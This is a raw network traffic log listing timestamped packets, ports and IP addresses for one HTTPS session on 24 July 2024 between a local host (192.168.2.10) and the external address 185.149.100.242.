Jul 24, 2024 19:56:31.647641897 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.647690058 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.647699118 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.647711992 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.687046051 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.687122107 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.687155008 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.687172890 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.687187910 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.688076019 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.688122988 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.688147068 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.688153028 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.688201904 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.756149054 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.756189108 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.756323099 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.756361008 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.756413937 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.757363081 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.757386923 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.757425070 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.757440090 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.757461071 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.757497072 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.758232117 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.758254051 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.758301973 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.758310080 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.758358002 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.759202957 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.759229898 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.759262085 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.759268045 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.759295940 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.759310007 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.760097027 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.760126114 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.760157108 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.760164022 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.760195971 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.760210037 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.761086941 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.761111975 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.761147976 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.761154890 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.761179924 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.761194944 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.775293112 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.775335073 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.775394917 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.775428057 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.775444031 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.775475979 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.775692940 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.775715113 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.775752068 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.775758982 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.775784969 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.775804043 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.823431969 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.823514938 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.823564053 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.823579073 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.823613882 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.823628902 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.823921919 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.823973894 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.823999882 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.824004889 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.824034929 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.824052095 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.848345995 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.848401070 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.848637104 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.848638058 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.848649979 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.848695993 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.848900080 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.848956108 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.848973989 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.848980904 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.849014044 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.849025965 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.854084969 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.854135036 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.854180098 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.854187965 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.854229927 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.854804039 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.854840040 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.854911089 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.854918003 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.854988098 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.865900040 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.865941048 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.865983009 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.865989923 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.866023064 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.866050005 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.867300034 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.867342949 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.867378950 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.867386103 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.867419004 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.867429972 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.905539036 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.905613899 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.905673027 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.905683994 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.905834913 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.905834913 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.906414032 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.906461954 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.906514883 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.906519890 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.906560898 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.931457043 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.931533098 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.931550980 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.931560993 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.931596041 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.931617975 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.933018923 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.933063984 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.933105946 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.933110952 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.933144093 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.933160067 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.933531046 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.933582067 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.933624029 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.933629990 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.933656931 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.933675051 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.935386896 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.935436010 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.935461998 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.935467005 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.935492039 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.935511112 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.951061964 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.951112986 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.951159000 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.951164961 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.951328993 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.951328993 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.952230930 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.952272892 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.952307940 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.952312946 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.952342033 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.952362061 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.995857954 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.995939016 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.995978117 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.995991945 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.996020079 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.996035099 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.996864080 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.996910095 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.996942043 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.996948957 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.996979952 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.996994019 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.019789934 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.019840956 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.019892931 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.019907951 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.019937038 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.019959927 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.020719051 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.020777941 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.020859957 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.020868063 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.020953894 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.021431923 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.021485090 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.021565914 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.021572113 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.021634102 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.023422003 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.023467064 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.023534060 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.023540020 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.023612976 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.038105965 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.038162947 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.038209915 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.038219929 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.038261890 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.038270950 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.039294958 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.039314985 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.039370060 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.039376974 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.039421082 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.049282074 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.083848953 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.083893061 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.084085941 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.084096909 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.084214926 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.084820986 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.084846973 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.084937096 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.084943056 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.085031033 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.107347965 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.107372046 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.107450008 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.107460976 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.107496977 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.107516050 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.108232975 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.108261108 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.108304024 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.108309984 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.108339071 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.108356953 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.110280037 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.110300064 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.110342979 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.110351086 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.110377073 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.110398054 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.110795975 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.110821962 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.110867023 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.110872030 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.110898972 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.110918045 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.124823093 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.124852896 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.124918938 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.124928951 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.124970913 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.125333071 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.125360966 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.125396013 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.125401974 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.125428915 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.125447035 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.170577049 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.170614958 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.170722008 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.170733929 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.170779943 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.171302080 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.171324968 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.171396017 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.171396017 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.171402931 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.171444893 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.193468094 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.193502903 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.193593979 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.193608046 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.193655014 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.194571018 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.194591045 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.194655895 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.194662094 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.194705009 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.196089983 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.196130991 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.196163893 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.196170092 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.196208000 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.196228027 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.196825027 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.196846008 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.196911097 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.196917057 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.196959972 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.211853981 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.211874008 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.211958885 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.211967945 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.212017059 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.212507010 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.212524891 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.212568998 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.212574005 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.212604046 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.212620020 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.241414070 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.260138988 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.260185003 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.260221958 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.260227919 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.260274887 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.260297060 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.261358976 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.261383057 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.261425018 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.261430979 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.261470079 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.261490107 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.282208920 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.282248020 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.282291889 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.282299042 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.282330990 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.282360077 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.283329964 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.283359051 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.283395052 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.283400059 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.283432961 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.283448935 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.284173965 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.284195900 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.284230947 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.284236908 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.284265041 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.284282923 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.284910917 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.284931898 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.285033941 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.285039902 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.285095930 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.304255962 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.304282904 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.304346085 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.304362059 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.304385900 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.304394960 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.304924965 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.304948092 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.304984093 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:32.304990053 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:32.305017948 CEST	49737	443	192.168.2.10	185.149.100.242
